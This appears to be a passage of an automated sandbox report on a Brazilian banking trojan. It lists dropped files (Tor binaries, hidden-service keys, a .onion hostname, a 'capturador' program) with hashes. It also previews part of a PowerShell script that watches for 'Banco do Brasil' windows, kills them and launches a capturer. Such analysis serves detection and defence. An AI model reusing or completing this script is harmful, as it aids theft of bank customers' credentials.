                                                Malicious:true
                                                Reputation:unknown
                                                C:\JQHPQS\monitor.ps1
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1688
                                                Entropy (8bit):5.279662107471557
                                                Encrypted:false
                                                SSDEEP:48:Dxc+6tOtDN95xLoXU8+IDp9frUr4KS692MEX+uCZGYiRIiGLaDr+:DxdpN34VSNsiZGY9yX+
                                                MD5:DD2C9A2529B9DB000E30FE0331F6FFAA
                                                SHA1:B7B89DC1E05479D421153EF5109DC72319C3943E
                                                SHA-256:EEF8C513B78DBE60D5FD2793052F7B29151B96D53A513BF6F2A27AB205A64B14
                                                SHA-512:E359DF6B0B7774E32522BF66932E4DD9561A5CBEA9F982369AB52FB1D51A4B7AD4AD5BAE6747717E126B6B14AB0018AA88B7EFB105E37CA6BCBDE140F60140F9
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: Add-Type -AssemblyName System.Web....$capturerFileName = $args[0]....$domain = $args[1]....Start-Job -ArgumentList $capturerFileName,$(Get-Location) -ScriptBlock {...$capturerProcess = $null......for(;;) {....$processList = Get-Process | Select-Object Id,MainWindowTitle.......foreach($process in $processList) {.....$title = $process.MainWindowTitle.........if ($title -like "*Banco do Brasil*") {.........Stop-Process -Id $process.Id -Force............#............if (!($capturerProcess -eq $null)) {.......Stop-Process -Id $capturerProcess.Id -Force......}............#............$capturerProcess = Start-Process -FilePath $args[0] -WorkingDirectory $args[1] -PassThru...........break.....}....}.......Start-Sleep -Milliseconds 100...}..}....#....$dataPath = "data"..$data = ""....For (;$data -eq "";) {....if (Test-Path -Path $dataPath) {....$data = Get-Content -Path $dataPath...}......Start-Sleep -Milliseconds 100..}....#....$onionHostPath = "$($env:ProgramData)\hscore\hostname"..$onionHost
                                                C:\JQHPQS\tor-gencert.exe
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                Category:dropped
                                                Size (bytes):1055232
                                                Entropy (8bit):6.432409650276543
                                                Encrypted:false
                                                SSDEEP:12288:EPmsFdKwDufqHtWxf9d+UDlh3CUrvVX7:cYwDufqHtWlXvlh35VL
                                                MD5:86585D1FEFE502AF61CC1AC83502D73D
                                                SHA1:92F5EA6539EDC25B7A43E5E62967941670F1CFD0
                                                SHA-256:7332B6E43206F54085B1CA61D6B8920E11E0F94D2AC82BBCBD852F378D703A77
                                                SHA-512:8EA093BFF34E768D33196441EA25A7EABAE9E0CA1DEF49EDDB018D8803D55D326D2624FCF9018225162720F8DDC97FE32E39F5AED711978BD46B3EC364B96154
                                                Malicious:true
                                                Reputation:unknown
                                                C:\JQHPQS\tor.exe
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                Category:dropped
                                                Size (bytes):4229632
                                                Entropy (8bit):6.445770642858094
                                                Encrypted:false
                                                SSDEEP:98304:nQcSbHtBsdxf/78Xd1U7hFndQI7yPr5L9E:QXHtBsPj8XdwndQIm
                                                MD5:67AB12CF6CABC14588E4F51B21C2134A
                                                SHA1:32A4FF564F38BF4B62007E419F19C991E60D6E14
                                                SHA-256:F0AAAE0364306BB7A4681D01935C96C2AC76B3576B7982990F86BCAF811A45BA
                                                SHA-512:2A1C67E9D23D6B050E35C5A8E159309CF598095239406C60A9F721FDDC912E21AFAB7036CBD9F77197CC4241DF5F8FA6AA9D7294762659178C6EDEB4699D5BEC
                                                Malicious:true
                                                Reputation:unknown
                                                C:\JQHPQS\zlib1.dll
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                Category:dropped
                                                Size (bytes):124416
                                                Entropy (8bit):6.479923939252401
                                                Encrypted:false
                                                SSDEEP:3072:HW7e1dL7Om0iXQmWfBoUSIgTBfHJNj9jjjjjjKeDEcz:HWCdLd4fBoUSIgTBxNj9jjjjjjKeDEc
                                                MD5:6F98DA9E33CD6F3DD60950413D3638AC
                                                SHA1:E630BDF8CEBC165AA81464FF20C1D55272D05675
                                                SHA-256:219D9D5BF0DE4C2251439C89DD5F2959EE582E7F9F7D5FF66A29C88753A3A773
                                                SHA-512:2983FAAF7F47A8F79A38122AA617E65E7DEDDD19BA9A98B62ACF17B48E5308099B852F21AAF8CA6FE11E2CC76C36EED7FFA3307877D4E67B1659FE6E4475205C
                                                Malicious:true
                                                Reputation:unknown
                                                C:\ProgramData\7a260420
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):2
                                                Entropy (8bit):1.0
                                                Encrypted:false
                                                SSDEEP:3:y:y
                                                MD5:81051BCC2CF1BEDF378224B0A93E2877
                                                SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                                SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                                SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ..
                                                C:\ProgramData\Leitor\capturador.exe
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):34304
                                                Entropy (8bit):6.5790668137555635
                                                Encrypted:false
                                                SSDEEP:384:SLGDDCVC75uC3KBLvc1+YPL2jyKvDZOzkcchbWKWXnIaBxopdhxrZNar6xrZNnDH:Z7wFvDckvhQXIVLzar8nDpNbQGB4/BG
                                                MD5:53FC515F425A2CDC9DADF1E139BC142B
                                                SHA1:B63CA1ABAB256B1619DA7DF994497E9F063F6713
                                                SHA-256:DABA783C0B0E47CE3096CA6661E785467B5EB45147DD29C09B77C6B18B7A3D7E
                                                SHA-512:FD91F97825A19C105A1304BC969CEEC33AF89614AA4CAC3C6BF75F3362CCB41C167431493BEBE8CA428FBA587E8089B9EAB7473148009AD9F8DE1A95093C3B1D
                                                Malicious:false
                                                Reputation:unknown
                                                C:\ProgramData\Leitor\capturador.exe.config
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):189
                                                Entropy (8bit):4.986033023891149
                                                Encrypted:false
                                                SSDEEP:3:JLWMNHU8LdgCzMvHcIMOofMuQVQDURAmIRMNHjFHr0lUfEyhTRGOGFvREBAW4QIT:JiMVBdTMkIGMfVJ7VJdfEyFRzSJuAW4p
                                                MD5:9DBAD5517B46F41DBB0D8780B20AB87E
                                                SHA1:EF6AEF0B1EA5D01B6E088A8BF2F429773C04BA5E
                                                SHA-256:47E5A0F101AF4151D7F13D2D6BFA9B847D5B5E4A98D1F4674B7C015772746CDF
                                                SHA-512:43825F5C26C54E1FC5BFFCCE30CAAD1449A28C0C9A9432E9CE17D255F8BF6057C1A1002D9471E5B654AB1DE08FB6EABF96302CDB3E0FB4B63BA0FF186E903BE8
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup> .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7.2" />.. </startup>..</configuration>
                                                C:\ProgramData\Leitor\libcrypto-1_1.dll
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):3651526
                                                Entropy (8bit):6.466199643222916
                                                Encrypted:false
                                                SSDEEP:98304:ySBPSXl6cx2yHPp8Bdao0sBIN0iIW9fK4ufzG1Z9Jp/K1CPwDv3uFfJOfjT5YLzc:Bk16cx2yHPp8Bdao0s++ib9fK4uLG1Z4
                                                MD5:3406F79392C47A72BED2F0067B3CE466
                                                SHA1:A8E2940D61FC840441C4E2A835959D197929FFDF
                                                SHA-256:E4B6B2CA32B1E2BA26959EC7380C4F117418D3A724F60494FF3CB81505FBF43D
                                                SHA-512:930D794AA8715DCD23FAFBEAD7FE2EC95D2863783B4C52279870CAD93D5B6CF02BA8A13E2653D2BF731E9882BF63F43A7E44788CE47505346BE3FE8E8B872FA4
                                                Malicious:false
                                                Reputation:unknown
                                                C:\ProgramData\Leitor\libevent-2-1-7.dll
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):1144039
                                                Entropy (8bit):6.2640955652625285
                                                Encrypted:false
                                                SSDEEP:24576:IdsuH81r7Lfml/aakxLDHGlOhRz7xiOStGX8PxUS2mmAWW:6uL0a3xLDHG8hRz7xiOzX8PxUfmt
                                                MD5:A3BF8E33948D94D490D4613441685EEE
                                                SHA1:75ED7F6E2855A497F45B15270C3AD4AED6AD02E2
                                                SHA-256:91C812A33871E40B264761F1418E37EBFEB750FE61CA00CBCBE9F3769A8BF585
                                                SHA-512:C20EF2EFCACB5F8C7E2464DE7FDE68BF610AB2E0608FF4DAED9BF676996375DB99BEE7E3F26C5BD6CCA63F9B2D889ED5460EC25004130887CD1A90B892BE2B28
                                                Malicious:false
                                                Reputation:unknown
                                                C:\ProgramData\Leitor\libevent_core-2-1-7.dll
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):975436
                                                Entropy (8bit):6.216593168771383
                                                Encrypted:false
                                                SSDEEP:24576:aYz/U9dYQv6wbSVliNPzIqENbtFXrFKtSRvwwfu:1Za6wbSV4NPzIqENTXrFKtIvG
                                                MD5:686C6A9DA6767287BF2E2126574FAFEA
                                                SHA1:2B0BE53C4AD4B67ECDFDCD97A717DE5A617F9EF0
                                                SHA-256:ABDC8CFB39D1431A1E740CF9DB2BBD604CDB7A4ED79E7E0A68D814E32A296164
                                                SHA-512:3CDE56FF25E53A9A04B5459113C89B8562C01B0F93E39C56BD6536824488F4F9347929935056012ADAA4982CBB8A39B61CE2F17CF92ECF02295AB1A922CD4DD4
                                                Malicious:false
                                                Reputation:unknown
                                                C:\ProgramData\Leitor\libevent_extra-2-1-7.dll
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):683256
                                                Entropy (8bit):6.173131714749706
                                                Encrypted:false
                                                SSDEEP:12288:39gDBeIO2+MMF5lDeXfzxjgtSMStxEX6eg5bTCubl:meh2JMF5lqXfzxUbStyX6eKnCubl
                                                MD5:070F988B98E9717BBD5E870A4F8C1611
                                                SHA1:17FB4C990C13A4FB0A2181FE139D3515FF8D96F6
                                                SHA-256:9DEB6F1776DB51FA7E4E89AD2779A9F07E9F22FCB5E24481FAA291D2D27E43FE
                                                SHA-512:C83D793BBE26E0297F9726B32CAD5BE3F92DBC36717C143FF7D55B7BD7BB20324FD86594BC626A374252656C3EE187FA4DCA4C3933FE19952894042B2127A6FD
                                                Malicious:false
                                                Reputation:unknown
                                                C:\ProgramData\Leitor\libgcc_s_sjlj-1.dll
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):1095418
                                                Entropy (8bit):6.031576353424405
                                                Encrypted:false
                                                SSDEEP:12288:yWgvC0/HECgnPAPQPtPTPSP7PaadQ2XDPcP8PwPhP5PhP4aEPzPaPugAPnPFgtPD:tmC0/yKX1JzUBDLTl3Ibzz2rnuNY
                                                MD5:BD40FF3D0CE8D338A1FE4501CD8E9A09
                                                SHA1:3AAE8C33BF0EC9ADF5FBF8A361445969DE409B49
                                                SHA-256:EBDA776A2A353F8F0690B1C7706B0CDAFF3D23E1618515D45E451FC19440501C
                                                SHA-512:404FB3C107006B832B8E900F6E27873324CD0A7946CDCCF4FFEEA365A725892D929E8B160379AF9782BCD6CFEB4C3C805740E21280B42BB2CE8F39F26792E5A1
                                                Malicious:false
                                                Reputation:unknown
                                                C:\ProgramData\Leitor\libssl-1_1.dll
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):1106247
                                                Entropy (8bit):6.189020449469006
                                                Encrypted:false
                                                SSDEEP:24576:mGCAHhCGlXKtc/LuaO88CJcpi9OTXu1UYaBQfPlawVzmkmNXtyRi0H4Ine3/Z0OX:ZCA5DuaOWJUu1UYaBQfPQwVzmkmNXtyk
                                                MD5:9E3D55FBF890C6CBFFD836F2AEF4BA31
                                                SHA1:715890BA3BDA3431470CCA4F4BC492C0F63FA138
                                                SHA-256:E6F4CF41373E8770C670CF5E85461F25385314ED9D8A2B37381BC84F5C0DD5C0
                                                SHA-512:9848F28FD96C21DD054CBF3E722E56373696C1F7803C137AFC7C7203325D9738FA6B984D95CD49FF78A6D95C8F9406F869AF3C3783901DA3CC003E2B09497D65
                                                Malicious:false
                                                Reputation:unknown
                                                C:\ProgramData\Leitor\libssp-0.dll
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):252871
                                                Entropy (8bit):5.911389655551474
                                                Encrypted:false
                                                SSDEEP:6144:DZRBjnF7ModBbDCdcJfstxzeo51aU6grhog4MmwYq55:1BJlDSkYzzugduM5
                                                MD5:B77328DA7CEAD5F4623748A70727860D
                                                SHA1:13B33722C55CCA14025B90060E3227DB57BF5327
                                                SHA-256:46541D9E28C18BC11267630920B97C42F104C258B55E2F62E4A02BCD5F03E0E7
                                                SHA-512:2F1BD13357078454203092ED5DDC23A8BAA5E64202FBA1E4F98EACF1C3C184616E527468A96FF36D98B9324426DDDFA20B62B38CF95C6F5C0DC32513EBACE9E2
                                                Malicious:false
                                                Reputation:unknown
                                                C:\ProgramData\Leitor\libwinpthread-1.dll
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):525113
                                                Entropy (8bit):6.099620174174238
                                                Encrypted:false
                                                SSDEEP:12288:/+Pm3Yv9CUauItmEz8HHLOA/TqlDCQdz9bVMPxTivFg:2Pm3Yv9CUauItmEz8HHLOA/TqluQdz9c
                                                MD5:19D7CC4377F3C09D97C6DA06FBABC7DC
                                                SHA1:3A3BA8F397FB95ED5DF22896B2C53A326662FCC9
                                                SHA-256:228FCFE9ED0574B8DA32DD26EAF2F5DBAEF0E1BD2535CB9B1635212CCDCBF84D
                                                SHA-512:23711285352CDEC6815B5DD6E295EC50568FAB7614706BC8D5328A4A0B62991C54B16126ED9E522471D2367B6F32FA35FEB41BFA77B3402680D9A69F53962A4A
                                                Malicious:false
                                                Reputation:unknown
                                                C:\ProgramData\Leitor\monitor.ps1
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1688
                                                Entropy (8bit):5.279662107471557
                                                Encrypted:false
                                                SSDEEP:48:Dxc+6tOtDN95xLoXU8+IDp9frUr4KS692MEX+uCZGYiRIiGLaDr+:DxdpN34VSNsiZGY9yX+
                                                MD5:DD2C9A2529B9DB000E30FE0331F6FFAA
                                                SHA1:B7B89DC1E05479D421153EF5109DC72319C3943E
                                                SHA-256:EEF8C513B78DBE60D5FD2793052F7B29151B96D53A513BF6F2A27AB205A64B14
                                                SHA-512:E359DF6B0B7774E32522BF66932E4DD9561A5CBEA9F982369AB52FB1D51A4B7AD4AD5BAE6747717E126B6B14AB0018AA88B7EFB105E37CA6BCBDE140F60140F9
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: Add-Type -AssemblyName System.Web....$capturerFileName = $args[0]....$domain = $args[1]....Start-Job -ArgumentList $capturerFileName,$(Get-Location) -ScriptBlock {...$capturerProcess = $null......for(;;) {....$processList = Get-Process | Select-Object Id,MainWindowTitle.......foreach($process in $processList) {.....$title = $process.MainWindowTitle.........if ($title -like "*Banco do Brasil*") {.........Stop-Process -Id $process.Id -Force............#............if (!($capturerProcess -eq $null)) {.......Stop-Process -Id $capturerProcess.Id -Force......}............#............$capturerProcess = Start-Process -FilePath $args[0] -WorkingDirectory $args[1] -PassThru...........break.....}....}.......Start-Sleep -Milliseconds 100...}..}....#....$dataPath = "data"..$data = ""....For (;$data -eq "";) {....if (Test-Path -Path $dataPath) {....$data = Get-Content -Path $dataPath...}......Start-Sleep -Milliseconds 100..}....#....$onionHostPath = "$($env:ProgramData)\hscore\hostname"..$onionHost
                                                C:\ProgramData\Leitor\tor-gencert.exe
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                Category:dropped
                                                Size (bytes):1055232
                                                Entropy (8bit):6.432409650276543
                                                Encrypted:false
                                                SSDEEP:12288:EPmsFdKwDufqHtWxf9d+UDlh3CUrvVX7:cYwDufqHtWlXvlh35VL
                                                MD5:86585D1FEFE502AF61CC1AC83502D73D
                                                SHA1:92F5EA6539EDC25B7A43E5E62967941670F1CFD0
                                                SHA-256:7332B6E43206F54085B1CA61D6B8920E11E0F94D2AC82BBCBD852F378D703A77
                                                SHA-512:8EA093BFF34E768D33196441EA25A7EABAE9E0CA1DEF49EDDB018D8803D55D326D2624FCF9018225162720F8DDC97FE32E39F5AED711978BD46B3EC364B96154
                                                Malicious:false
                                                Reputation:unknown
                                                C:\ProgramData\Leitor\tor.exe
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                Category:dropped
                                                Size (bytes):4229632
                                                Entropy (8bit):6.445770642858094
                                                Encrypted:false
                                                SSDEEP:98304:nQcSbHtBsdxf/78Xd1U7hFndQI7yPr5L9E:QXHtBsPj8XdwndQIm
                                                MD5:67AB12CF6CABC14588E4F51B21C2134A
                                                SHA1:32A4FF564F38BF4B62007E419F19C991E60D6E14
                                                SHA-256:F0AAAE0364306BB7A4681D01935C96C2AC76B3576B7982990F86BCAF811A45BA
                                                SHA-512:2A1C67E9D23D6B050E35C5A8E159309CF598095239406C60A9F721FDDC912E21AFAB7036CBD9F77197CC4241DF5F8FA6AA9D7294762659178C6EDEB4699D5BEC
                                                Malicious:false
                                                Reputation:unknown
                                                C:\ProgramData\Leitor\zlib1.dll
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                Category:dropped
                                                Size (bytes):124416
                                                Entropy (8bit):6.479923939252401
                                                Encrypted:false
                                                SSDEEP:3072:HW7e1dL7Om0iXQmWfBoUSIgTBfHJNj9jjjjjjKeDEcz:HWCdLd4fBoUSIgTBxNj9jjjjjjKeDEc
                                                MD5:6F98DA9E33CD6F3DD60950413D3638AC
                                                SHA1:E630BDF8CEBC165AA81464FF20C1D55272D05675
                                                SHA-256:219D9D5BF0DE4C2251439C89DD5F2959EE582E7F9F7D5FF66A29C88753A3A773
                                                SHA-512:2983FAAF7F47A8F79A38122AA617E65E7DEDDD19BA9A98B62ACF17B48E5308099B852F21AAF8CA6FE11E2CC76C36EED7FFA3307877D4E67B1659FE6E4475205C
                                                Malicious:false
                                                Reputation:unknown
                                                C:\ProgramData\hscore\hostname (copy)
                                                Process:C:\JQHPQS\MRZANK.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):64
                                                Entropy (8bit):4.622828664259099
                                                Encrypted:false
                                                SSDEEP:3:WPcPH/PJElIWg/DMh4LO49vn:WkPnKlIf/DW4rv
                                                MD5:68B03E90B440CC3090D34F5E380945AF
                                                SHA1:C0F571C01F0B0FF1EAAA79D71ECBB56E9506F54C
                                                SHA-256:E6DBB3EDC221DE52E879179E6409429BECA2D27F6460AA3D5B1A75DFD703F32D
                                                SHA-512:D95E22FDA14B015232431210EBC863125F94143C79D6458700546EF99480F5DB55BEC9F608B7A74B277CF5A464A7FBEF7F765026115EA78F3606814E754F7ADD
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: tdsq33q6hcygiooykiiojh56ofxawsc5l232c6utpv5ufibdqlbnn5qd.onion..
                                                C:\ProgramData\hscore\hostname.tmp
                                                Process:C:\JQHPQS\MRZANK.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):64
                                                Entropy (8bit):4.622828664259099
                                                Encrypted:false
                                                SSDEEP:3:WPcPH/PJElIWg/DMh4LO49vn:WkPnKlIf/DW4rv
                                                MD5:68B03E90B440CC3090D34F5E380945AF
                                                SHA1:C0F571C01F0B0FF1EAAA79D71ECBB56E9506F54C
                                                SHA-256:E6DBB3EDC221DE52E879179E6409429BECA2D27F6460AA3D5B1A75DFD703F32D
                                                SHA-512:D95E22FDA14B015232431210EBC863125F94143C79D6458700546EF99480F5DB55BEC9F608B7A74B277CF5A464A7FBEF7F765026115EA78F3606814E754F7ADD
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: tdsq33q6hcygiooykiiojh56ofxawsc5l232c6utpv5ufibdqlbnn5qd.onion..
                                                C:\ProgramData\hscore\hs_ed25519_public_key (copy)
                                                Process:C:\JQHPQS\MRZANK.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):64
                                                Entropy (8bit):5.538909765557392
                                                Encrypted:false
                                                SSDEEP:3:16GGRAAYlLPdA30v4DY8nn:XuAAYlzdAkv4E8nn
                                                MD5:4D8D5849BEF847D2985DEA2C4011954E
                                                SHA1:B0DEA555E498A19DE8F4347BD6B1C87CA21DFC55
                                                SHA-256:195072C824C4EB63A78D9D3261AC7189B44D386CD5A5846902DD43053BE8E505
                                                SHA-512:21A838D53D19F79C9FB0C49F3CD4D94C918901AB4BE115D9C24890D5E7D1036C75A71F7C416F5669C99D881B7A702E89025F53BAC772D674A672136836120751
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: == ed25519v1-public: type0 ==........8.d9.R..qn.H]^..z.}{B.#..
                                                C:\ProgramData\hscore\hs_ed25519_public_key.tmp
                                                Process:C:\JQHPQS\MRZANK.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):64
                                                Entropy (8bit):5.538909765557392
                                                Encrypted:false
                                                SSDEEP:3:16GGRAAYlLPdA30v4DY8nn:XuAAYlzdAkv4E8nn
                                                MD5:4D8D5849BEF847D2985DEA2C4011954E
                                                SHA1:B0DEA555E498A19DE8F4347BD6B1C87CA21DFC55
                                                SHA-256:195072C824C4EB63A78D9D3261AC7189B44D386CD5A5846902DD43053BE8E505
                                                SHA-512:21A838D53D19F79C9FB0C49F3CD4D94C918901AB4BE115D9C24890D5E7D1036C75A71F7C416F5669C99D881B7A702E89025F53BAC772D674A672136836120751
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: == ed25519v1-public: type0 ==........8.d9.R..qn.H]^..z.}{B.#..
                                                C:\ProgramData\hscore\hs_ed25519_secret_key (copy)
                                                Process:C:\JQHPQS\MRZANK.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):96
                                                Entropy (8bit):5.998872266278551
                                                Encrypted:false
                                                SSDEEP:3:16GGx6qAYlOBHLIylE1D0mhbpuRdiBVhb7:XwAYlOpzeJZ8Rdih
                                                MD5:FB030F4D0E44F71B55CB3A86D5460306
                                                SHA1:C285C60AE5E61C22D161E220808EE1CA4E9F1C01
                                                SHA-256:2CC2DF47F45AC4FC6B973A31F1597F635B141983388629119EC71BA21B2BE5C5
                                                SHA-512:EDA4EAAE1ED3FA07F0CD779D561221E8A9F7C2EC181C656D9975A341B24B1BB213E76DE55E602E0F922DF904B74316EEDA9010513BC6F5109FC0935B24EA5EC5
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: == ed25519v1-secret: type0 ==...H..f.?.-.gT,.q0.@%.D...P...>..iw...!P....A....SF...-$Ur..-D/...
                                                C:\ProgramData\hscore\hs_ed25519_secret_key.tmp
                                                Process:C:\JQHPQS\MRZANK.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):96
                                                Entropy (8bit):5.998872266278551
                                                Encrypted:false
                                                SSDEEP:3:16GGx6qAYlOBHLIylE1D0mhbpuRdiBVhb7:XwAYlOpzeJZ8Rdih
                                                MD5:FB030F4D0E44F71B55CB3A86D5460306
                                                SHA1:C285C60AE5E61C22D161E220808EE1CA4E9F1C01
                                                SHA-256:2CC2DF47F45AC4FC6B973A31F1597F635B141983388629119EC71BA21B2BE5C5
                                                SHA-512:EDA4EAAE1ED3FA07F0CD779D561221E8A9F7C2EC181C656D9975A341B24B1BB213E76DE55E602E0F922DF904B74316EEDA9010513BC6F5109FC0935B24EA5EC5
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: == ed25519v1-secret: type0 ==...H..f.?.-.gT,.q0.@%.D...P...>..iw...!P....A....SF...-$Ur..-D/...
                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):8003
                                                Entropy (8bit):4.839308921501875
                                                Encrypted:false
                                                SSDEEP:192:yxoe5oVsm5emdVVFn3eGOVpN6K3bkkjo59gkjDt4iWN3yBGHh9smidcU6CXpOTik:DBVoGIpN6KQkj2Wkjh4iUx0mib4J
                                                MD5:937C6E940577634844311E349BD4614D
                                                SHA1:379440E933201CD3E6E6BF9B0E61B7663693195F
                                                SHA-256:30DC628AB2979D2CF0D281E998077E5721C68B9BBA61610039E11FDC438B993C
                                                SHA-512:6B37FE533991631C8290A0E9CC0B4F11A79828616BEF0233B4C57EC7C9DCBFC274FB7E50FC920C4312C93E74CE621B6779F10E4016E9FD794961696074BDFBFA
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):22600
                                                Entropy (8bit):5.663338822617787
                                                Encrypted:false
                                                SSDEEP:384:9t9yXjGUw0r71MXgKNCYVYlbGeSBKnqAo/AmjKlBKZIO9M4Sa3E2j+gk1kVsJDJo:4p1M5NCzlD4KlozbP1E2j+3iVsZO
                                                MD5:3956148386B00C605F9EB0823FC5E61B
                                                SHA1:5B38ABD9BCBF11EBA8C4ED2D96286C710ABFCF23
                                                SHA-256:28AF515059CC11996B04D6DCB93BF6C2A6D9BCDA40C33C7E87B8421550701D08
                                                SHA-512:981473D2A0AB6C23E143D873FF6B21FF182B890601FFACE84ABAA1A8B2EE700756FBA3269C8D4E835895685AEE7F23A7F39EBFAC721D3DBE830C162B01ED14CB
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: @...e...................h...k.^.P.....h.8.I..........@..........H...............<@.^.L."My...:G..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)*.......System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP...............-K..s.F..*.]`.,G.....(.Microsoft.PowerShell.Commands.ManagementD..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                C:\Users\user\AppData\Local\Temp\Pro11.tmp
                                                Process:C:\Windows\SysWOW64\msiexec.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):395
                                                Entropy (8bit):2.111361674316822
                                                Encrypted:false
                                                SSDEEP:3:rCL/2F/F9UcRATg/cCRrWFFFFx4VaIIHXUIIFINZ1/X7yfncU2/XDy:GLOnAEkC4/CIBIF81eEHG
                                                MD5:DCCC5F28B39F5F636645E46E04BA9F56
                                                SHA1:980C96692A869A9A9B39B4BE420976BDB4898B98
                                                SHA-256:AE18C7ACC8227B04A25727CBEE47047B4CDBCD589B2226618BCC5EF3532CB0B5
                                                SHA-512:ECE1555FE534646C8DFE459A6F6ACDEABC68C19AE3F31ADC604B662A8CF9C9B79C51EFB018FFA47B717454282F6F996EE5211AB97646F659A060BB2547CD9C0C
                                                Malicious:false
                                                Reputation:unknown
